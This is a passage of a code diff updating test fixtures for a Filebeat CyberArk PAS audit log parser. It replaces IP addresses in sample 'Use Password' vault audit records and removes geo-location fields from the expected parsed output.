2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n 
Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use 
Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n 
Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.14","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 67.43.156.14\n \n \n \n \n \n Use Password\n 81.2.69.143\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.2.69.143","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json index 5dfac39be327..609b7c410eea 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log-expected.json @@ -80,11 +80,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:12Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "fun and profit", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", 
@@ -92,11 +92,6 @@ "cyberarkpas.audit.station": "127.0.0.1", "cyberarkpas.audit.timestamp": "Mar 11 09:38:12", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "use password", @@ -128,7 +123,7 @@ "related.ip": [ "127.0.0.1", "34.123.103.115", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator", @@ -154,11 +149,11 @@ "cyberarkpas.audit.ca_properties.user_name": "adrian", "cyberarkpas.audit.desc": "Use Password", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:49Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Use Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.14\n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.reason": "FOR FUN.", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", 
@@ -166,11 +161,6 @@
 "cyberarkpas.audit.station": "127.0.0.1",
 "cyberarkpas.audit.timestamp": "Mar 11 09:46:49",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "destination.user.name": "adrian",
 "event.action": "use password",
@@ -192,7 +182,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5109,
+ "log.offset": 5107,
 "log.syslog.priority": "5",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -202,7 +192,7 @@
 "related.ip": [
 "127.0.0.1",
 "34.123.103.115",
